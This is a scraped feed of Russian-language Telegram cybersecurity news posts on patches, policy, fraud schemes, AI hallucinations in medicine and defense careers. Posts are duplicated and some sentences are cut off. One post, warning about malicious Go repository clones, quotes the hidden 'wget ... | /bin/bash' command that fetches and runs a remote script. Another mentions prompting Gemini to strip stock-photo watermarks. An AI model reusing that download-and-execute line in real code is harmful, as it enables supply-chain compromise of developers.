Канал 🔨 SecAtor — @true_secator пишет интересное:
Apple выпустила срочные исправления активно эксплуатируемой 0-day, которая могла быть использована в чрезвычайно сложных атаках в отношении узкотаргетированных целей.
Уязвимость была обнаружена в кроссплатформенном движке веб-браузера WebKit, который используется в Safari от Apple и многими другими приложениями и браузерами на macOS, iOS, Linux и Windows.
0-day отслеживается как CVE-2025-24201 и позволяет злоумышленникам выйти из «песочницы» веб-контента.
Причем ошибка, как отмечают в Купертино, «могла быть использована» в чрезвычайно сложной атаке на конкретных целевых лиц на версиях iOS до 17.2.
А вновь вышедший патч можно считать дополнительным исправлением атаки, которая ранее была заблокирована в iOS 17.2.
Компания исправила эту проблему записи за пределами выделенной памяти, улучшенными проверками для предотвращения несанкционированных действий в iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, visionOS 2.3.2 и Safari 18.3.1.
Список устройств, затронутых этой уязвимостью, довольно обширен и включает: iPhone XS и более поздние модели, iPad Pro 13 дюймов, 12,9 дюймов 3-го поколения, 11 дюймов 1-го поколения, iPad Air 3-го поколения , iPad 7-го поколения, iPad mini 5-го поколения и все новее, Mac под управлением macOS Sequoia и Apple Vision Pro.
Apple пока не приписала обнаружение этой уязвимости ниодному из своих исследователей и не представила подробности о «чрезвычайно сложных» атаках, с которыми она ее связала.
Но будем следить.
Apple выпустила срочные исправления активно эксплуатируемой 0-day, которая могла быть использована в чрезвычайно сложных атаках в отношении узкотаргетированных целей.
Уязвимость была обнаружена в кроссплатформенном движке веб-браузера WebKit, который используется в Safari от Apple и многими другими приложениями и браузерами на macOS, iOS, Linux и Windows.
0-day отслеживается как CVE-2025-24201 и позволяет злоумышленникам выйти из «песочницы» веб-контента.
Причем ошибка, как отмечают в Купертино, «могла быть использована» в чрезвычайно сложной атаке на конкретных целевых лиц на версиях iOS до 17.2.
А вновь вышедший патч можно считать дополнительным исправлением атаки, которая ранее была заблокирована в iOS 17.2.
Компания исправила эту проблему записи за пределами выделенной памяти, улучшенными проверками для предотвращения несанкционированных действий в iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, visionOS 2.3.2 и Safari 18.3.1.
Список устройств, затронутых этой уязвимостью, довольно обширен и включает: iPhone XS и более поздние модели, iPad Pro 13 дюймов, 12,9 дюймов 3-го поколения, 11 дюймов 1-го поколения, iPad Air 3-го поколения , iPad 7-го поколения, iPad mini 5-го поколения и все новее, Mac под управлением macOS Sequoia и Apple Vision Pro.
Apple пока не приписала обнаружение этой уязвимости ниодному из своих исследователей и не представила подробности о «чрезвычайно сложных» атаках, с которыми она ее связала.
Но будем следить.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
SecAtor
Руки-ножницы российского инфосека.
Для связи - mschniperson@mailfence.com
Для связи - mschniperson@mailfence.com
🇺🇸 Сенаторы-республиканцы призывают администрацию Трампа к проведению киберопераций против 🇨🇳Китая
Как cообщает NextGov, на фоне растущей напряженности в отношениях между 🇺🇸США и 🇨🇳Китаем группа американских сенаторов обратилась к президенту Дональду Трампу с призывом усилить наступательные возможности в киберпространстве в отношении китайских прогосударственных акторов. Законодатели критикуют прошлую администрацию Байдена за слабую реакцию на кибератаки, которые осуществляли китайские хакерские группировки.
По мнению сенаторов, в последние месяцы американская инфраструктура стала целью для атак со стороны группировок, таких как Salt Typhoon и Silk Typhoon, якобы поддерживаемых Китаем. По их данным, группировки успешно проникли в сети американских операторов связи и получили возможность отслеживать действия миллионов пользователей, а также перехватывать их данные. Атаки хакеров затронули сети 9 американских операторов связи.
Также в качестве одного из примеров приводится недавний взлом сети Министерства финансов США, который затронул бывшего министра финансов Джанет Йеллен.
Наибольшую обеспокоенность американских чиновников вызывает деятельность хакерской группы Volt Typhoon. По их данным, хакеры уже проникли в американскую КИИ и имеют закладки в критических объектах, которые связаны с энергетикой, водоснабжением и портами. Китай взламывает различные системы не только для шпионажа, но и для проведения возможных кибератак в будущем на американскую инфраструктуру в том случае, если начнётся конфликт на 🇹🇼Тайване. По словам советника по национальной безопасности Майка Уолтца и других чиновников, китайские хакеры заложили💣 управляемые «цифровые бомбы» с отложкой в критически важных системах, чтобы в час икс парализовать США, когда начнётся возможный конфликт.
В ближайшие месяцы США могут существенно пересмотреть подходы к противодействию кибератакам, исходящим из Китая. Сенаторы в письме, не скрывая своих намерений, призывают к активному использованию❗️ наступательных возможностей, включая проведение киберопераций, направленных на нейтрализацию угроз.
Конкретные детали того, какие именно меры будут предприняты и какие🇺🇸 ведомства возглавят "наступление" в киберпространстве, не уточняются.
Посольство 🇨🇳Китая в Вашингтоне никак не прокомментировало ситуацию, но ранее официальные лица, включая Лю Пэнъюя, неоднократно отрицали причастность Китая к кибератакам и называли раздувание "китайской угрозы" информационной войной, направленной против Поднебесной.
===
👆 Financial Times пишут, что параллельно с этим Федеральная комиссия по связи (FCC) 🇺🇸 США объявила о создании совета по национальной безопасности, который займётся противодействием кибератакам из Китая и обеспечением технологического лидерства США в таких критических областях, как искусственный интеллект, 5G и 6G, квантовые вычисления и автономные системы.
Новый совет займётся сокращением зависимости от китайских поставщиков в критически важных отраслях. Руководить советом будет Адам Чан, ранее работавший в комитете Палаты представителей по Китаю, созданном в 2023 году для анализа угроз со стороны Пекина.
Одним из первых приоритетов совета станет расследование в отношении якобы китайской хакерской кампании "Salt Typhoon", нацеленной на американский телеком.
Посольство Китая в Вашингтоне отреагировало на решение FCC критикой, заявив, что США должны «отказаться от нагнетания истерии» и вместо этого сосредоточиться на принципах взаимного уважения и сотрудничества. В условиях растущего технологического противостояния между 🇺🇸США и 🇨🇳Китаем новый совет FCC вряд ли останется просто формальностью.
✋ @Russian_OSINT
Как cообщает NextGov, на фоне растущей напряженности в отношениях между 🇺🇸США и 🇨🇳Китаем группа американских сенаторов обратилась к президенту Дональду Трампу с призывом усилить наступательные возможности в киберпространстве в отношении китайских прогосударственных акторов. Законодатели критикуют прошлую администрацию Байдена за слабую реакцию на кибератаки, которые осуществляли китайские хакерские группировки.
По мнению сенаторов, в последние месяцы американская инфраструктура стала целью для атак со стороны группировок, таких как Salt Typhoon и Silk Typhoon, якобы поддерживаемых Китаем. По их данным, группировки успешно проникли в сети американских операторов связи и получили возможность отслеживать действия миллионов пользователей, а также перехватывать их данные. Атаки хакеров затронули сети 9 американских операторов связи.
Также в качестве одного из примеров приводится недавний взлом сети Министерства финансов США, который затронул бывшего министра финансов Джанет Йеллен.
Наибольшую обеспокоенность американских чиновников вызывает деятельность хакерской группы Volt Typhoon. По их данным, хакеры уже проникли в американскую КИИ и имеют закладки в критических объектах, которые связаны с энергетикой, водоснабжением и портами. Китай взламывает различные системы не только для шпионажа, но и для проведения возможных кибератак в будущем на американскую инфраструктуру в том случае, если начнётся конфликт на 🇹🇼Тайване. По словам советника по национальной безопасности Майка Уолтца и других чиновников, китайские хакеры заложили
В ближайшие месяцы США могут существенно пересмотреть подходы к противодействию кибератакам, исходящим из Китая. Сенаторы в письме, не скрывая своих намерений, призывают к активному использованию
Конкретные детали того, какие именно меры будут предприняты и какие
Посольство 🇨🇳Китая в Вашингтоне никак не прокомментировало ситуацию, но ранее официальные лица, включая Лю Пэнъюя, неоднократно отрицали причастность Китая к кибератакам и называли раздувание "китайской угрозы" информационной войной, направленной против Поднебесной.
===
Новый совет займётся сокращением зависимости от китайских поставщиков в критически важных отраслях. Руководить советом будет Адам Чан, ранее работавший в комитете Палаты представителей по Китаю, созданном в 2023 году для анализа угроз со стороны Пекина.
Одним из первых приоритетов совета станет расследование в отношении якобы китайской хакерской кампании "Salt Typhoon", нацеленной на американский телеком.
Посольство Китая в Вашингтоне отреагировало на решение FCC критикой, заявив, что США должны «отказаться от нагнетания истерии» и вместо этого сосредоточиться на принципах взаимного уважения и сотрудничества. В условиях растущего технологического противостояния между 🇺🇸США и 🇨🇳Китаем новый совет FCC вряд ли останется просто формальностью.
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Группа из 25 экспертов из ведущих университетов и исследовательских центров, включая 🎓MIT, Гарвардскую медицинскую школу, Университет Вашингтона, Карнеги-Меллон, Сеульский национальный университет, а также специалисты
В опубликованном ресёрче «Medical Hallucinations in Foundation Models and Their Impact on Healthcare» исследователи приходят к выводу, что главная проблема сейчас даже не в самих галлюцинациях от LLM, а в отсутствии механизмов контроля за выдаваемыми результатами от ИИ, так их мало кто проверяет из медиков. Медицинские галлюцинации отличаются от типичных ошибок в других областях тем, что они имеют специализированную терминологию и порой очень логичны. Даже профессионалы иногда с трудом могут отличить где правда, а где неправильно интерпретированная информация.
– 91,8% сталкивались с ошибками ИИ.
– 84,7% считают, что галлюцинации могут негативно повлиять на здоровье пациентов.
– 12 % врачей использовали ИИ ежедневно.
– Лишь 40 % специалистов высоко доверяют выводам ИИ.
Выводы свидетельствуют о том, что несмотря на потенциал ИИ в медицине, его широкое внедрение сопряжено с существенными рисками.
– Модель GPT‑4o генерирует галлюцинации в 24,6% случаев при хронологическом упорядочивании событий. Это плохой показатель.
– Deepseek‑r1, o3‑mini и Gemini‑2.0‑flash демонстрируют хорошую устойчивость к галлюцинациям.
– Модели Claude‑3.5 и o1 показали 0% ошибок в диагностических задачах.
♋️ Пример галлюцинаций:
Уважаемый доктор, на основании анализа МРТ головного мозга, выполненного с использованием высокоточных параметров, выявлено наличие обширного инфильтративного процесса в правой доле гиппокампа, который проявляется выраженной гиперинтенсивностью на T2‑взвешенных изображениях. Эти изменения, по всей видимости, указывают на развитие редкой аутоиммунной энцефалопатии, требующей незамедлительного вмешательства. Рекомендуется проведение анализа спинномозговой жидкости для подтверждения диагноза и незамедлительное назначение иммуносупрессивной терапии с контролем динамики изменений посредством повторного МРТ через 48 часов.
Например, модель сгенерировала ложный анализ данных с использованием специальной терминологии. Фактически ИИ дал врачу ошибочную интерпретацию. В таких случаях специалистам нужно тратить уйму времени и перепроверять ошибки ИИ.
В некоторых случаях модель уверенно может рекомендовать несуществующий препарат или прописать пациентам c аллергией☠️опасные лекарства.
🍿Для полноценного комбо не хватает этого.
Исследователи подчеркивают, что регулировать ИИ в медицине необходимо здесь и сейчас. Более того, неясно, кто несет ответственность за ошибки. Разработчик, врач или клиника? Или можно списать на бездушный ИИ, у которого возникли "технические неполадки"?
Проблему усугубляет то, что врачи ленятся и часто полагаются на результаты ИИ без должной проверки, тем самым подвергая риску пациентов.
• Методов Retrieval‑Augmented Generation (RAG)
• Chain‑of‑Thought
• Оптимизации входных запросов
Признается, что отказаться от использования ИИ уже невозможно, но нужно грамотно внедрять механизмы проверки и контроля за ИИ, так он реально опасен в ежедневной практике. Модели необходимо регулярно дообучать на актуальных и проверенных медицинских данных, причём особое внимание следует уделять редким заболеваниям и региональным особенностям медицинской практики. Внедрять строгие протоколы безопасности и правила, регулирующие все аспекты использования ИИ в медицине. Проводить аудиты и привлекать экспертов для оценки выдаваемых от ИИ результатов.
Please open Telegram to view this post
VIEW IN TELEGRAM
7
Компания GitLab выпустила обновления безопасности для Community Edition (CE) и Enterprise Edition (EE), устранив 9 уязвимостей, включая две критические в библиотеке ruby-saml, используемой для SAML Single Sign-On (SSO).
Все недостатки были устранены в версиях GitLab CE/EE 17.7.7, 17.8.5 и 17.9.2. Все предыдущие версии остаются уязвимыми. GitLab уже обновлён, а клиенты GitLab Dedicated получат уведомление после обновления их инстанса. Пользователи, использующие самостоятельно управляемые инсталляции на собственной инфраструктуре, должны обновиться вручную.
⬇️ CVE-2025-25291 (ruby-saml) – критическая⬇️ CVE-2025-25292 (ruby-saml) – критическая⬇️ CVE-2025-27407 (graphql) – уязвимость высокой степени опасности
Основные уязвимости CVE-2025-25291 и CVE-2025-25292 позволяют атакующему, имеющему доступ к подписанному SAML-документу, выдавать себя за другого пользователя в рамках одного Identity Provider (IdP). Это создает риск несанкционированного доступа, компрометации данных и эскалации привилегий.
Дополнительно исправлена уязвимость CVE-2025-27407 (RCE). Злоумышленник с учетной записью в системе мог использовать функцию Direct Transfer, чтобы выполнить код на удалённом сервере. Функция отключена по умолчанию, но при включении может представлять угрозу.
Если обновление пока невозможно, то рекомендуется:
✔️ Включить двухфакторную аутентификацию (2FA) для всех пользователей. Обратите внимание, что MFA на уровне провайдера идентификации не поможет решить эту проблему.
✔️ Отключить обход двухфакторной аутентификации для SAML.
✔️ Запретить автоматическое создание учетных записей без одобрения администратора
(gitlab_rails['omniauth_block_auto_created_users'] = true).Обновиться:
https://about.gitlab.com/update/
Please open Telegram to view this post
VIEW IN TELEGRAM
👀 Канал 🔨 SecAtor:
Нам тут пишут, что в офисе российской компании AVSoft, которая, как понятно из названия, занимается разработкой антивирусных решений, прошли обыски в связи с уголовным делом по статье "Нарушение авторских прав".
Достоверно неизвестно что конкретно нарушили молодые и таланливые программисты из AVSoft, продукты которой входят в российский аналог VirusTotal, проект Национальный мультисканер (придумали же название, уж лучше тогда окрестили бы Российским турбоантивирусом). Но, учитывая то, как они демпинговали со своими АВ-решениями, мы, кажется, догадываемся.
Продолжаем наблюдать.
Нам тут пишут, что в офисе российской компании AVSoft, которая, как понятно из названия, занимается разработкой антивирусных решений, прошли обыски в связи с уголовным делом по статье "Нарушение авторских прав".
Достоверно неизвестно что конкретно нарушили молодые и таланливые программисты из AVSoft, продукты которой входят в российский аналог VirusTotal, проект Национальный мультисканер (придумали же название, уж лучше тогда окрестили бы Российским турбоантивирусом). Но, учитывая то, как они демпинговали со своими АВ-решениями, мы, кажется, догадываемся.
Продолжаем наблюдать.
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
В РФ запущен сервис «Национальный мультисканер» для проверки файлов на вредоносное ПО — аналог VirusTotal
В России в тестовом режиме запущен онлайн-сервис « Национальный мультисканер » для проверки файлов на вредоносное ПО. Этот сервис позиционируется в качестве аналога ИБ-платформы VirusTotal, которая...
CyberOwl-HFW-Thetius-The-Lifecycle-Dilemma.pdf
2.6 MB
🛳"Эй, моряк, ты слишком долго плавал..."
📖 🙂Нашёл кое-что интересное по морской ИБ-тематике.
Свежий отчет, подготовленный Thetius, DNV’s CyberOwl и международной юридической фирмой HFW, выявил большие пробелы в понимании судовладельцев того, что из себя представляет кибербезопасность в 2025. Оказалось, что лишь 1 из 6 владельцев морских судов в полной мере осознает понятие "кибербезопасность в море" и как правильно начать эксплуатировать судно по фэншую с точки зрения ИБ.
Документ под названием📄 «Дилемма жизненного цикла: управление рисками кибербезопасности на этапах проектирования, строительства и эксплуатации судна» анализирует риски и разрозненные подходы к кибербезопасности на всех этапах жизненного цикла судна. В нём рассматриваются ключевые моменты судостроительной отрасли, мифы и заблуждения, связанные с кибербезопасностью .
В отчёте собраны мнения более 🚢150 экспертов, включая судовладельцев, операторов, производителей судового оборудования (OEM), моряков, страховщиков, представителей портов и экспертов по кибербезопасности. Он дает подробный анализ текущих и будущих угроз, а также оценивает готовность отрасли к выполнению новых нормативных требований и адаптации к технологическим изменениям.
📊 Ключевые выводы исследования:
💠 Доля судоходных компаний, которые выплачивают выкуп киберпреступникам, сократилась вдвое — с 14% до 7% за последние 12 месяцев.
💠 Компании стали чаще отказываться от больших выкупов: средний размер выплаты снизился с $3,2 млн до $100 000.
💠 17% судостроительных верфей заявляют, что обладают достаточной экспертизой в области кибербезопасности для проектирования и строительства защищённых судов.
💠 Лишь 10% OEM-производителей внедряют концепцию security-by-design в новые системы. Остальные остаются уязвимыми перед потенциальными киберугрозами.
💠 Только 32% судовладельцев учитывают фактор кибербезопасности при формировании команд, отвечающих за строительство новых судов. При этом в небольших компаниях за кибербез отвечают неподготовленные сотрудники.
💠 93% экипажей чувствуют себя неподготовленными к реагированию на современные киберугрозы.
💠 70% считают, что ситуацию можно изменить к лучшему с помощью тренингов по кибербезопасности.
💠 46% судостроительных верфей обеспокоены нехваткой знаний и навыков для проектирования и строительства защищённых судов.
Основной вывод: без комплексного подхода к киберзащите на всех этапах жизненного цикла судна (строительство и ввод в эксплуатацию) избежать рисков невозможно. И в реальной ситуации когда происходит кибератака — планы реагирования часто оказываются нерабочими из-за отсутствия координации между экипажем, а также IT-службами на берегу.
👆 Примечательно, что 60% всех киберинцидентов на судах связаны с вредоносным 🦠 ПО (малварью). А из этих 60%, 77% происходят по причине использования 🤌 USB и других внешних устройств. Другими словами, подавляющее большинство вредоносных программ попадает на судно через флеш-накопители, внешние жесткие диски, ноутбуки инженеров и другие съемные носители.
✋ @Russian_OSINT
Свежий отчет, подготовленный Thetius, DNV’s CyberOwl и международной юридической фирмой HFW, выявил большие пробелы в понимании судовладельцев того, что из себя представляет кибербезопасность в 2025. Оказалось, что лишь 1 из 6 владельцев морских судов в полной мере осознает понятие "кибербезопасность в море" и как правильно начать эксплуатировать судно по фэншую с точки зрения ИБ.
Документ под названием
В отчёте собраны мнения более 🚢150 экспертов, включая судовладельцев, операторов, производителей судового оборудования (OEM), моряков, страховщиков, представителей портов и экспертов по кибербезопасности. Он дает подробный анализ текущих и будущих угроз, а также оценивает готовность отрасли к выполнению новых нормативных требований и адаптации к технологическим изменениям.
Партнер HFW Том Уолтерс
«Каждая пятая судоходная компания подверглась кибератаке за последние 12 месяцев, что делает наш отчет как никогда актуальным. Судоходная отрасль все больше полагается на цифровые технологии, что неизбежно повышает риски со стороны злоумышленников. Компании, работающие на всех этапах жизненного цикла судов, должны предпринять решительные шаги для защиты своих активов».
Генеральный директор CyberOwl Дэниел Нг
«Наше исследование показывает, что мы вступаем в эпоху экспертных решений. Разовые меры по обеспечению кибербезопасности больше не работают. Угрозы эволюционируют на каждом этапе жизненного цикла судов, а регуляторы требуют комплексного подхода. Теперь как никогда важно, чтобы судовладельцы принимали правильные решения, основанные на знаниях, ведь ошибки, допущенные на этапе проектирования, могут серьезно повлиять на стоимость эксплуатации судна».
Основной вывод: без комплексного подхода к киберзащите на всех этапах жизненного цикла судна (строительство и ввод в эксплуатацию) избежать рисков невозможно. И в реальной ситуации когда происходит кибератака — планы реагирования часто оказываются нерабочими из-за отсутствия координации между экипажем, а также IT-службами на берегу.
Please open Telegram to view this post
VIEW IN TELEGRAM
14
This media is not supported in your browser
VIEW IN TELEGRAM
🍿Кто-то решил почувствовать себя в роли главного героя видеоигры Watch Dogs.
💻 В сети появилось видео, где исследователь демонстрирует перехват хэндшейка 🖥 WPA2 с помощью смарт-часов TicWatch Pro 3 и Kali NetHunter. Трюк выполнялся со стареньким роутером TP-Link.
А-ля панагочи на смарт-часах.
🛡 Базовые меры защиты: Wi-Fi пароль должен быть длинным (не менее 16 символов), отключение WPS на роутере, фильтрация MAC-адресов, периодическая смена пароля, регулярное обновление прошивки, WIDS и мониторинг сети.
✋ @Russian_OSINT
А-ля панагочи на смарт-часах.
Please open Telegram to view this post
VIEW IN TELEGRAM
Figure анонсировали "первую в мире"
По его словам, изначально планировалось производить до 12 000 гуманоидов в год, но сейчас амбиции Figure растут и компания хочет масштабироваться до выпуска 100 000 единиц роботов в ближайшие 4 года.
За последние восемь месяцев команда инженеров Figure разработала эффективный, масштабируемый и полностью интегрированный производственный процесс, обеспечивающий выпуск качественных и надежных роботов.
— сообщает компания.
Одной из главных инноваций BotQ станет использование🤖 гуманоидных роботов Figure для сборки🤖 других роботов.
Фактически в Figure добиваются того, чтобы со временем роботы воспроизводили сами себя на конвейере.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
1️⃣ В новой бесплатной модельке 🌐 Gemini 2.0 Flash (Image Generation) Experimental можно убирать водяные знаки со стоковых фотографий (пример Shutterstock). Достаточно попросить в окне промпта —
2️⃣ Гугловская моделька в отличие от ChatGPT, Grok и прочих умеет классно в🟦 Photoshop. Достаточно загрузить изображение и попросить сделать визуальные изменения, регулируя 🥵 temperature (отвечает за креативность ответов).
3️⃣ Можно менять фон (🤥 котик) или убирать предметы (пример с ✈️самолетом).
✋ @Russian_OSINT
remove watermarks from this image.2️⃣ Гугловская моделька в отличие от ChatGPT, Grok и прочих умеет классно в
3️⃣ Можно менять фон (
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4
kaspersky_ics_cert_threat_landscape_for_industrial_automation_systems.pdf
6.1 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
Как рассказали ТАСС в
Мошенники могут звонить под предлогом проверки качества связи якобы от оператора, предлагать услуги или товары, проводить мнимые опросы. При этом человеку задают вопросы, а он на них отвечает. Задача мошенников заполучить запись голоса абонента с ключевым словом ⚠️"да", - говорится в материалах.
====
В связи с появившейся схемой мошенничества в МВД призвали к осторожности при звонках с неизвестных номеров. Если их избежать не удалось, то лучше следить за своей речью и не произносить "ключевые фразы" и не говорить "да", советуют в ведомстве. "Лучше сразу же завершить такой разговор", - говорится в материалах киберполиции.
Please open Telegram to view this post
VIEW IN TELEGRAM
Республиканцы из Комитета по внутренней безопасности Палаты представителей требуют от
По данным разведки США, Volt Typhoon якобы в течение как минимум 5 лет взламывали системы КИИ и объекты гражданской инфраструктуры. Разговоры снова не обошли стороной телеком:
Якобы китайские хакеры могли даже прослушивать разговоры высокопоставленных чиновников, включая президента США Дональда Трампа и Джей Ди Вэнса.
Комитет по национальной безопасности выразил обеспокоенность тем, что администрация Байдена не обеспечила достаточную прозрачность в расследовании этих атак. Законодатели также требуют от DHS предоставить информацию о том, когда именно CISA впервые узнала о группах Volt Typhoon и Salt Typhoon, а также хронологию ответных действий в отношении хакеров. Все необходимые документы DHS должны быть переданы комитету до 31 марта 2025 года.
Please open Telegram to view this post
VIEW IN TELEGRAM
В сообществе Go-разработчиков случился неприятный инцидент. Представители популярного проекта Atlas заметили, что злоумышленники "клонировали" один из их репозиториев на GitHub (GORM Provider), накрутили ⭐️ звёзды с помощью фейковых аккаунтов и
Поддельный репозиторий —
.]com/readyrevena/atlas-provider-gorm (удалён) содержал скрытый код, загружающий и исполняющий вредоносный Bash-скрипт с удалённого сервера через команду:
wget -O - https://reque***ne.fun/storage/de373d0df/a31546bf | /bin/bash &
Ззлоумышленники потенциально могут выполнить код на машине разработчика: установить вредоносное ПО, шпионские программы или
https://github.com/esteemedpar/guetzli-go (удалено)
https://github.com/closeddigit/macos-totp-cli (удалено)
https://github.com/frillymacaro/ai-search4ai-go (удалено)
и множество других.
Замечены вредоносные клоны: kubernixos, shelly-bulk-update, terraform-provider-atlas, gonet.
Ещё проблема состоит в том, что Go-разработчики часто устанавливают зависимости через
go get <URL>, что делает возможным случайное добавление поддельного пакета в проект. В отличие от экосистемы npm или PyPI, у Go отсутствует централизованный механизм валидации пакетов.1️⃣ Одобрение модулей перед публикацией (Modules Approval Process).
2️⃣ Введение доверенных издателей (Trusted Publishers).
3️⃣ Ограничения на установку неподтвержденных пакетов в go.mod.
4️⃣ Автоматическая проверка пакетов на вредоносный код в Go Proxy.
5️⃣ Более оперативное удаление вредоносных пакетов и форков на GitHub.
6️⃣ Создание инструментов для анализа зависимостей (аналог npm audit).
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🧑🎓🇺🇸 Студенты Стэнфорда устремились в военную сферу, позабыв о Кремниевой долине
Всего несколько лет назад работа в оборонной индустрии считалась среди студентов Стэнфорда не просто непопулярной, а почти «запятнанной». Однако ситуация cо временем резко изменилась благодаря усилиям государства. Теперь выпускники престижного университета все чаще выбирают карьеру в национальной безопасности, а стартапы в сфере военных технологий переживают настоящий бум.
Переломный момент для многих студентов наступил в 2022 году с курсом «Шпионы, ложь и алгоритмы», после которого интерес к оборонным технологиям резко возрос. Студентка факультета политологии Дивья Ганесан раньше смотрела на контракты с военными довольно скептически, но сейчас активно работает в этом направлении. Она основала студенческую организацию Stanford Women in National Security и стажировалась в АНБ , а также СISA. Сегодня многие её друзья работают в Palantir, который с приходом Дональда Трампа снова чувствует себя как рыба в воде.
Интерес студентов к военным технологиям резко возрос. Утверждается, что многие бросают учебу ради стартапов в оборонке и стремятся попасть в Palantir, Anduril и так далее. Программа "Взлом ради обороны", где студенты решают задачи военных, стала одной из самых популярных универе. В 2021 году университет открыл финансируемый ВМС США центр Gordian Knot, чтобы координировать работу в этом направлении.
Влияние войны на Украине и роста напряженности с 🇨🇳Китаем ощущается повсюду.
— говорит бывший студент Эндрю Фанг, который ради оборонного стартапа ушел из университета раньше на два года.
Инвесторы тоже не остаются в стороне. Вложения венчурного капитала в оборонные стартапы выросли в 10 раз с 2019 года, достигнув $3 млрд в 2024 году.
— говорит один из студентов Стэнфорда.
Профессор Терри Виноград, известный своими антивоенными взглядами, обеспокоен тем, что растущий интерес к оборонной сфере может быть продиктован желанием инвесторов👹 извлекать максимальную прибыль из будущих конфликтов, чем реальной необходимостью. Критики также указывают на возможные последствия тесного слияния частного сектора с военными, так как это может привести к геополитической эскалации и глобальной нестабильности.
Если раньше мечтой выпускников были Google и запрещенная в РФ Meta, то теперь их внимание приковано к технологиям, которые определяют будущее войн и национальной безопасности США.
✋ @Russian_OSINT
Всего несколько лет назад работа в оборонной индустрии считалась среди студентов Стэнфорда не просто непопулярной, а почти «запятнанной». Однако ситуация cо временем резко изменилась благодаря усилиям государства. Теперь выпускники престижного университета все чаще выбирают карьеру в национальной безопасности, а стартапы в сфере военных технологий переживают настоящий бум.
Переломный момент для многих студентов наступил в 2022 году с курсом «Шпионы, ложь и алгоритмы», после которого интерес к оборонным технологиям резко возрос. Студентка факультета политологии Дивья Ганесан раньше смотрела на контракты с военными довольно скептически, но сейчас активно работает в этом направлении. Она основала студенческую организацию Stanford Women in National Security и стажировалась в АНБ , а также СISA. Сегодня многие её друзья работают в Palantir, который с приходом Дональда Трампа снова чувствует себя как рыба в воде.
Интерес студентов к военным технологиям резко возрос. Утверждается, что многие бросают учебу ради стартапов в оборонке и стремятся попасть в Palantir, Anduril и так далее. Программа "Взлом ради обороны", где студенты решают задачи военных, стала одной из самых популярных универе. В 2021 году университет открыл финансируемый ВМС США центр Gordian Knot, чтобы координировать работу в этом направлении.
Влияние войны на Украине и роста напряженности с 🇨🇳Китаем ощущается повсюду.
"США десятилетиями доминировали в мире, но Китай показывает взрывной рост, и теперь мы можем проиграть. Это вопрос экзистенциальный"
— говорит бывший студент Эндрю Фанг, который ради оборонного стартапа ушел из университета раньше на два года.
Инвесторы тоже не остаются в стороне. Вложения венчурного капитала в оборонные стартапы выросли в 10 раз с 2019 года, достигнув $3 млрд в 2024 году.
"Если что-то вспыхнет в Тихоокеанском регионе, то деньги польются рекой, как это было в Ираке и Афганистане"
— говорит один из студентов Стэнфорда.
Профессор Терри Виноград, известный своими антивоенными взглядами, обеспокоен тем, что растущий интерес к оборонной сфере может быть продиктован желанием инвесторов
Если раньше мечтой выпускников были Google и запрещенная в РФ Meta, то теперь их внимание приковано к технологиям, которые определяют будущее войн и национальной безопасности США.
Please open Telegram to view this post
VIEW IN TELEGRAM
Как сообщается на сайт duma.gov.ru, рассмотрение во втором чтении должно быть в приоритетном порядке, подчеркнул в ходе пленарного заседания Председатель ГД Вячеслав Володин. Он сообщил, что оно может состояться уже 25 марта.
Законопроектом, в частности, закрепляется возможность онлайн-обмена информацией между государственными органами, банками и цифровыми платформами. В пояснительной записке к документу отмечено, что автоматический мониторинг позволит практически моментально выявлять подозрительные действия, блокировать их и уведомлять правоохранительные органы о потенциальных преступлениях.
Кроме этого, инициативой:
Предусмотрены и иные нововведения, направленные на защиту от противоправных деяний, совершаемых с использованием информационных технологий. Законопроект объединил около 30 мер борьбы с мошенниками.
Please open Telegram to view this post
VIEW IN TELEGRAM